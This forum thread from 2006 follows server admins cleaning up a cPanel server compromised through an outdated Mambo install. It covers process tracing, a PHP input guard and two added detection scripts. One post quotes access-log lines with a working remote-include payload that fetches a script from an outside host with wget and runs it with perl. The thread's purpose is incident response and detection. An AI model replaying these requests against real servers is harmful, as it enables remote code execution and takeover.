The Community Forums


Howto locate source of hacked server

Discussion in 'General Discussion' started by garnar, Apr 27, 2006.

  1. garnar

    garnar Member

    Joined:
    Jul 1, 2004
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    151
    My cpanel server running :

    WHM 10.8.0 cPanel 10.8.1-R113
    Fedora i686 - WHM X v3.1.0

    has been hacked into. On boot I get this inetd service that loads up and hogs most of the cpu/ram. After time it will spawn other inetd processes run as user nobody. I am unable to locate the source of where this is started from. These are the processes:

    24668 nobody 0 26.1 0.2 inetd
    24963 nobody 0 25.5 0.2 inetd
    25017 nobody 0 25.2 0.2 inetd
    23896 nobody 0 22.9 0.2 /var/sbin/whos
    23999 nobody 0 19.9 0.2 /var/tmp/whos
    17984 nobody 0 19.6 0.2 inetd
    18311 nobody 0 19.6 0.2 inetd
    18641 nobody 0 19.3 0.2 inetd
    26543 nobody 0 19.3 0.2 inetd

    Running netstat I see this:
    tcp 0 80 cpanel.binghamXXX.XXX:36689 ircd-188.buy-a-shell.n:ircd ESTABLISHED
    tcp 0 80 cpanel.binghamXXX.XXX:36690 ircd-188.buy-a-shell.n:ircd ESTA

    I am not running any IRC servers on this machine so I know something is wrong here. I would like to be able to locate where this fake inetd starts from and kill it. Thanks in advance for any help.
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,472
    Likes Received:
    20
    Trophy Points:
    463
    Location:
    Go on, have a guess
    It's too broad a subject to cover the issue in a forum thread and you'd be advised to hire a security expert.

    That said, using tools such as lsof will help you track down the location of exploits:

    lsof -p 24668 | more

    After cleaning up the mess, the next major step is finding out how they got in, and that involves trawling all your web logs in:

    /usr/local/apache/logs/*
    /usr/local/apache/domlogs/*

    The process name is usually completely meaningless as any script or binary can change its name - indeed it's what they do to try and avoid detection and likely has nothing to do with inetd.
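Following on from the lsof tip, an added example (not from the thread, and not a cPanel or lsof tool) that does the same process-to-file mapping through /proc and flags what the first post shows: a binary run out of /tmp or /var/tmp, a binary deleted after launch, or a process name that does not match its executable (an "inetd" that is really perl). The function names is_suspicious_exe, check_proc and scan_all are my own.

```shell
#!/bin/sh
# Tie a process to the file it was started from via /proc (the same facts
# "lsof -p PID" shows as its txt and cwd entries) and flag the patterns from
# the first post: a binary run out of scratch space, a binary deleted after
# launch, or a process name that does not match the executable behind it.

# is_suspicious_exe EXE_PATH COMM_NAME -> returns 0 if worth a look, 1 if not.
is_suspicious_exe() {
    exe="$1"
    comm="$2"
    # Unreadable link (not root, or a kernel thread): nothing to judge.
    [ "$exe" = "unknown" ] && return 1
    case "$exe" in
        /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;   # started from scratch space
        *"(deleted)"*) return 0 ;;                   # binary removed after launch
    esac
    # The real inetd is /usr/sbin/inetd; an "inetd" backed by perl is not.
    # (comm is truncated to 15 chars, so very long names need extra care.)
    case "$exe" in
        */"$comm") return 1 ;;   # name matches the executable's basename
        *) return 0 ;;
    esac
}

# check_proc PID -> prints "PID EXE COMM" and returns 0 when suspicious.
check_proc() {
    pid="$1"
    [ -r "/proc/$pid/comm" ] || return 1
    comm=$(cat "/proc/$pid/comm")
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo unknown)
    if is_suspicious_exe "$exe" "$comm"; then
        printf '%s %s %s\n' "$pid" "$exe" "$comm"
        return 0
    fi
    return 1
}

# Walk every PID; run as root so /proc/PID/exe is readable for other users.
scan_all() {
    for d in /proc/[0-9]*; do
        check_proc "${d#/proc/}" || true
    done
}

if [ "${1:-}" = "--scan" ]; then
    scan_all
fi
```

Legitimate name mismatches exist (a shell reported as sh but backed by dash, busybox applets), so treat a hit as a lead to confirm with lsof, not a verdict.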
     
  3. garnar

    garnar Member

    Joined:
    Jul 1, 2004
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    151
    Thanks for the tip, I was just looking for a few commands to tie a process to a file that I could find on the system.
     
  4. clara

    clara Member

    Joined:
    Aug 31, 2005
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    151
    I have the exact same issue, CPU runs too high because of nobody-inetd process, and there is no way I can access any site nor whm, nor cpanel. I have to reboot the system just to see the same thing in a few hours.
     
  5. garnar

    garnar Member

    Joined:
    Jul 1, 2004
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    151
    This is due to a Mambo install that is not up to date. What happens is they use a php exploit to download a file from a remote server then it spawns multiple fake inetd daemons that act as IRC servers/ port scanners and god knows what else. Take a look at getting your Mambo sites patched. The CP script to auto install installs a version that is out of date and has known exploits for it.

    In your index.php and index2.php files you need to use this code at the top. Also I suggest doing this for the index files located in the administrator dir. Additionally you might want to password protect the admin dir.

    /** Set flag that this is a parent file */
    define( '_VALID_MOS', 1 );

    // Names of the PHP superglobals. With register_globals on, a request such as
    // ?_REQUEST[option]=...&GLOBALS= can overwrite them from the query string.
    $protects = array('_REQUEST', '_GET', '_POST', '_COOKIE', '_FILES', '_SERVER', '_ENV', 'GLOBALS', '_SESSION');

    foreach ($protects as $protect) {
        // Refuse the request if any of those names arrives as an input key.
        if ( in_array($protect , array_keys($_REQUEST)) ||
             in_array($protect , array_keys($_GET)) ||
             in_array($protect , array_keys($_POST)) ||
             in_array($protect , array_keys($_COOKIE)) ||
             in_array($protect , array_keys($_FILES))) {
            die("Invalid Request.");
        }
    }
    // checks for configuration file, if none found loads installation page
     
  6. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    168
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    Does anyone know the exploit URL that they use to break in via Mambo? Is this Mambo specific or does it apply to Joomla as well?

    The reason I'm asking for the exploit URLs is that we can then block them with mod_security. This saves time over going through hundreds of Mambo/Joomla sites!! :)

    Anyone know?
     
  7. garnar

    garnar Member

    Joined:
    Jul 1, 2004
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    151
    This is what I have seen so far; I'm looking for the other host that was doing this:

    82.77.174.39 - - [15/May/2006:14:16:12 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 288

    EDIT: Here's the other one; there is one more, and when I find it I'll let you know.

    66.197.38.94 - - [16/May/2006:03:17:19 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/aubyn/tools.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebs.com/aubyn/gif.txt;perl%20gif.txt;rm%20-rf%20gif*? HTTP/1.0" 404 -
     
    #7 garnar, May 17, 2006
    Last edited: May 17, 2006
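An added example (my own, not from the thread or from mod_security) of the log trawl chirpy suggested, run over the domlogs for the request shape in the two lines above: PHP superglobals passed as query parameters (_REQUEST[...], GLOBALS=) together with mosConfig_absolute_path pointed at a remote URL. The sample lines are constructed from the posted ones with placeholder hosts; scan_rfi_log, rfi_sources and count_hits are my names.

```shell
#!/bin/sh
# Scan Apache access/domlogs for the Mambo/Joomla remote-include request shape
# posted above. Usage on a real server:
#   scan_rfi_log < /usr/local/apache/domlogs/example.com
#   rfi_sources  < /usr/local/apache/domlogs/example.com

# Superglobal names smuggled in as query keys, or the config path pointed at a URL.
RFI_PATTERN='mosConfig_absolute_path=(https?|ftp)://|[?&](_REQUEST|_GET|_POST|_COOKIE|_SERVER|_FILES|GLOBALS)(\[|=)'

# scan_rfi_log: print every matching log line read from stdin.
scan_rfi_log() {
    grep -E -- "$RFI_PATTERN"
}

# rfi_sources: count matching requests per client IP (first log field).
rfi_sources() {
    scan_rfi_log | awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# Constructed sample: two lines modelled on the posted ones (attacker host and
# command payload replaced with placeholders) and one benign request.
SAMPLE_LOG='203.0.113.10 - - [15/May/2006:14:16:12 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/tool.gif? HTTP/1.0" 404 288
198.51.100.7 - - [16/May/2006:03:17:19 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/tools.gif? HTTP/1.0" 404 -
203.0.113.10 - - [16/May/2006:03:20:00 -0400] "GET /portal/index.php?option=com_content&Itemid=1 HTTP/1.0" 200 5120'

# count_hits: number of suspicious lines in the sample (2 of the 3 above).
count_hits() {
    printf '%s\n' "$SAMPLE_LOG" | scan_rfi_log | wc -l | tr -d ' '
}
```

A 404 on the index.php line does not mean the attempt failed elsewhere: the include fires inside PHP, so check every Mambo/Joomla docroot the same IP touched.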
  8. garnar

    garnar Member

    Joined:
    Jul 1, 2004
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    151
    That's a good and a bad idea. You really need to make the code changes to Mambo/Joomla so this doesn't happen. Anyone can run code on your server under the user apache runs as.
     
  9. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    168
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    Yes, ideally, but since Mambo/Joomla don't have an autoupdate function at the moment, this requires going through a whole server. A mod_security blocking rule is an instant fix, so it's a great idea and works well for most of the hosting population. Over time, sure, the users can go back and update their Joomla installations, but that's not something most of us have time to do.

    Looks like a standard mod_security rule for wget, which most people should have, will block this, but obviously it's still worth updating Joomla over time.

    And, if you run phpsuexec, that's only a normal user. If you run as nobody, then ... well ... open slather I guess! And, unless I'm confused, if you have the mod_security blocking rule, then nobody can use the holes anyway, so what's the problem?

    This goes back to a basic security principle which is what you were alluding to above. It's not enough to have one level of security - for instance, just mod_security, because if mod_security fails you're in trouble. You need two levels of security - updated Joomla/phpBB scripts, as well as mod_security.
     
    #9 brianoz, May 18, 2006
    Last edited: May 18, 2006
  10. linuxserverguy

    linuxserverguy Active Member

    Joined:
    Apr 14, 2005
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    151
    Can you please tell what's the location to find these logs? ty.

    nevermind
     
    #10 linuxserverguy, May 23, 2006
    Last edited: May 24, 2006